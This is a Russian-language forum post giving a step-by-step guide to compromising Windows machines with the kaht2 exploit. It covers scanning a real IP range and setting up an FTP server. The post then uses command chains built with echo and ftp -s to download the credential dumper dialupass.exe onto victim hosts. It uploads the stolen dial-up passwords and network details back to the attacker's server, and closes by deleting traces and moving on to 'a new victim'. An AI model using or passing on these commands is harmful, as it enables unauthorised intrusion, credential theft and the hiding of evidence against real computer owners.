Вот держи.К примеру используй сплоит kaht2
Скачиваем вышеуказанные файлы. Создаем папки 'D:\scan\kaht2', 'D:\scan\kaht2\ftp', 'D:\scan\kaht2\ftp\upload', 'D:\scan\kaht2\ftp\download'.
Распаковываем kaht2.zip в папку D:\scan\kaht2, ftp.zip - D:\scan\kaht2\ftp, dialupass.zip - в D:\scan\kaht2\ftp\download.

Запускаем наш FTP сервер и заходим в раздел User Accounts.
Если уже есть какие-то созданные пользователи, то удаляем их. Жмем на кнопку ADD, вводим имя юзера 'upload' и жмем ОК. Выбираем путь до папки D:\scan\kaht2\ftp\upload и жмем OK. В поле Password вводим upload, ставим галочки как на рисунке и жмем Update.

Снова жмем на кнопку ADD, вводим имя юзера 'download' и жмем ОК. Выбираем путь до папки D:\scan\kaht2\ftp\download и жмем OK. В поле Password вводим download, ставим галочки как на рисунке и жмем Update.

Всё, ftp настроен, переходим к самому главному.
Запускаем ftp-сервер, нажав на зеленую кнопку в вверху и переходим в раздел Server Log.
Жмем на выполнить в меню пуск

Вводим cmd и жмем OK

В окне вводим D:, жмем Enter, вводим cd scan\kaht2 и снова жмем энтер.

Теперь запускаем сам кахт. вводим kaht2.exe 57.66.134.0 57.66.134.255 20 и жмем Enter. Начинается процесс сканирования.
Если у вас не появилось ни одной подобной строчки

значит, беда с файрволом или там провайдером. Отключаем файрвол или меняем своего прова. Идеальными провайдерами для использования кахта однозначно являются Equant, GIN и AT&T.
Если же всё сканится, то ждем появления пободной строчки

Набираем cd.., жмем Enter, cd temp и снова жмем Enter.

Набираем следующую команду (вместо 57.66.158.238 вписываем СВОЙ ip):
echo open 57.66.158.238>download&&echo download>>download&&echo download>>download&&echo get dialupass.exe>>download&&echo bye>>download
И жмем Enter, далее набираем ftp -s:download, жмем ENTER,
Потом того как она выполнится и появится мигающий курсор по порядку выполняем ещё три команды, после набора каждой нажимаем Enter:
dialupass.exe /allusers /stext dialupass.txt
ipconfig /all>ip.txt
set a=%random%
В окне должно получиться нечто следующего типа:

Вводим dir dialupass.txt и жмем ENTER, до тех пор пока не появится следующая строчка:

Как тока она появилась вводим следующую команду и жмем ENTER:
echo open 57.66.158.238>upload&&echo upload>>upload&&echo upload>>upload&&echo mkdir %a%>>upload&&echo cd %a%>>upload&&echo send dialupass.txt>>upload&&echo send ip.txt>>upload&&echo bye>>upload
А потом вводим ftp -s:upload и опять жмем ENTER:
В окне должно отобразиться нечто похожее на это:

Подчищаем за собой следы.
del * /F/Q
И идем в поисках новой жертвы
exit